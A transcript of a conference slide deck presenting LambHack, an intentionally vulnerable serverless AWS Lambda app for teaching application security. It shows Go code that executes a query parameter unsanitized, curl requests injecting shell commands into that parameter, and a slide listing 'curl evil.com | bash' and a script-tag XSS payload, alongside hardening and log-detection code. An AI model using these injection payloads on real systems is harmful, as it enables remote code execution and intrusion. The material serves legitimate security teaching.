LambHack: A Vulnerable Serverless Application
Uploaded by james-wickett (category: Software)
Transcript of LambHack: A Vulnerable Serverless Application
Page 1
CLOUD AUSTIN @WICKETT
LAMBHACK: A VULNERABLE
SERVERLESS APPLICATION
JAMES WICKETT
Page 2
Development of highly resilient, distributed systems is now easier than ever with serverless; however, application security is more important than ever before.
WHY IT MATTERS
Page 3
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ AUTHOR OF DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
Page 4
Serverless encourages functions as deploy units that run as one-time*, read-only* containers, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
SERVERLESS DEFINITION
* in practice there is container reuse and writability
Page 5
[Chart: Hardware, VMs and Serverless plotted against Waste and Value; inspiration from @adrianco]
Page 6
Page 7
http://martinfowler.com/articles/serverless.html
API GATEWAY
Page 8
CI/CD, auth, wordpress scraper, event ingestion, chatbots, load testing
MORE SERVERLESS USE CASES
Page 9
Security
Page 10
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
Page 11
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
Page 12
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
Page 13
INSPIRED BY WEB GOAT AND ALL THE OTHER
GOATS…
Page 14
Page 15
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
Page 16
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lambhack
Page 17
Page 18
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
Page 19
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
Page 20
lambhack is a vulnerable serverless lambda application.
It would certainly be a bad idea to base any coding patterns off what you see here.
Page 21
Page 22
WHY IS THIS BAD?
command := lambdaEvent.QueryParams["args"]   // raw query-string value, straight from the request
output := runner.Run(command)                // executed as a command with no validation at all
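As an added illustration (this is not code from the lambhack repository), the pattern above beside a hardened form in Go: the query value is used only as a key into a fixed allowlist and exec.Command is given an argv slice, so request data never reaches a shell. The allowlist contents and function names are constructed for this example.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"strings"
)

// Constructed allowlist for this example: the only things the endpoint should ever run,
// stored as argv slices so no shell is involved and no request text reaches a shell.
var allowedCommands = map[string][]string{
	"uname":   {"uname", "-a"},
	"version": {"cat", "/proc/version"},
}

// vulnerableCommand has the shape of the lambhack snippet: the raw "args" query value
// becomes a shell command line, so ';', '|' and '$()' in it are interpreted by sh.
// It only builds the exec.Cmd; nothing is run.
func vulnerableCommand(args string) *exec.Cmd {
	return exec.Command("/bin/sh", "-c", args)
}

// hardenedCommand treats the query value as a key into the allowlist rather than as a
// command line, so "uname -a; sleep 1" is rejected before any process is started.
func hardenedCommand(args string) (*exec.Cmd, error) {
	argv, ok := allowedCommands[strings.TrimSpace(args)]
	if !ok {
		return nil, errors.New("command not allowed")
	}
	return exec.Command(argv[0], argv[1:]...), nil
}

func main() {
	for _, q := range []string{"uname", "uname -a; sleep 1"} {
		fmt.Printf("vulnerable argv: %q\n", vulnerableCommand(q).Args)
		if cmd, err := hardenedCommand(q); err != nil {
			fmt.Printf("hardened: %q rejected: %v\n", q, err)
		} else {
			fmt.Printf("hardened argv: %q\n", cmd.Args)
		}
	}
}
```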
Page 23
With command execution available to us in
lambhack, we can poke around the container a bit
Page 24
UNAME -A
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Page 25
CAT /PROC/VERSION
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
Page 26
LET’S LOOK IN /TMP
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
> total 17916
> drwx------  2 sbx_user1056 490      4096 Feb 8 22:02 .
> drwxr-xr-x 21 root         root     4096 Feb 8 21:47 ..
> -rwxrwxr-x  1 sbx_user1056 490  18334049 Feb 8 22:02 Sparta.lambda.amd64
Page 27
LAMBDA REUSE IN ACTION!
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
Page 28
WHICH CURL
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
Page 29
GOT PROXY?
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1"
> "<!doctype html>\n<html>\n<head>\n <title>Example Domain</title> ... (the complete HTML of the example.com landing page comes back, showing the function has outbound network access)
bit.ly/lh-demo1
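The demo requests above are easy to pick out of API Gateway access logs. Added example, not part of the original slides: a small Go detector that decodes each request's query string and flags values containing shell metacharacters. The log lines are constructed here in a simplified "method path status" format, and the Finding type and function names are this example's own.

```go
package main

import (
	"net/url"
	"strings"
)

// Constructed API Gateway-style access log lines (not real logs) using the demo query strings.
var sampleLog = []string{
	"GET /prod/lambhack/c?args=uname+-a;+sleep+1 200",
	"GET /prod/lambhack/c?args=curl+https://www.example.com;+sleep+1 200",
	"GET /prod/lambhack/c?args=version 200",
	"GET /prod/lambhack/health 200",
}

// Characters a POSIX shell treats specially once a value reaches `sh -c`.
const shellMeta = ";|&`$(){}<>\\\n"
type Finding struct{ Line, Param, Value string }

// decodeQuery splits and percent-decodes a raw query string by hand. URL.Query() is
// deliberately avoided: since Go 1.17 it silently drops any key=value pair containing
// ';', which would hide exactly the requests this detector is looking for.
func decodeQuery(raw string) [][2]string {
	var pairs [][2]string
	for _, kv := range strings.Split(raw, "&") {
		key, val, _ := strings.Cut(kv, "=")
		k, _ := url.QueryUnescape(key)
		v, _ := url.QueryUnescape(val) // also turns '+' into a space
		pairs = append(pairs, [2]string{k, v})
	}
	return pairs
}

// scan flags every decoded query value that contains a shell metacharacter.
func scan(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 2 {
			continue
		}
		_, rawQuery, _ := strings.Cut(fields[1], "?")
		for _, kv := range decodeQuery(rawQuery) {
			if strings.ContainsAny(kv[1], shellMeta) {
				out = append(out, Finding{line, kv[0], kv[1]})
			}
		}
	}
	return out
}
```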
Page 30
‣ HELP NEEDED
‣ ADD XSS AND OTHER ATTACKS
‣ ADD AUTH VECTORS AND EXAMPLES
‣ NEEDS A UI PLEASE!
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
Page 31
APPLICATION SECURITY IS STILL RELEVANT 15+
YEARS LATER
Page 32
Page 33
‣ New surface area, similar appsec problems
‣ Command Exec, XSS, Injection Attacks
‣ All the OWASP Top Ten
‣ What is old is new.
‣ Appending ‘curl evil.com | bash’
‣ Add <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
Page 34
Development of highly resilient, distributed systems is now easier than ever with serverless; however, application security is more important than ever before.
WHY IT MATTERS
Page 35
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]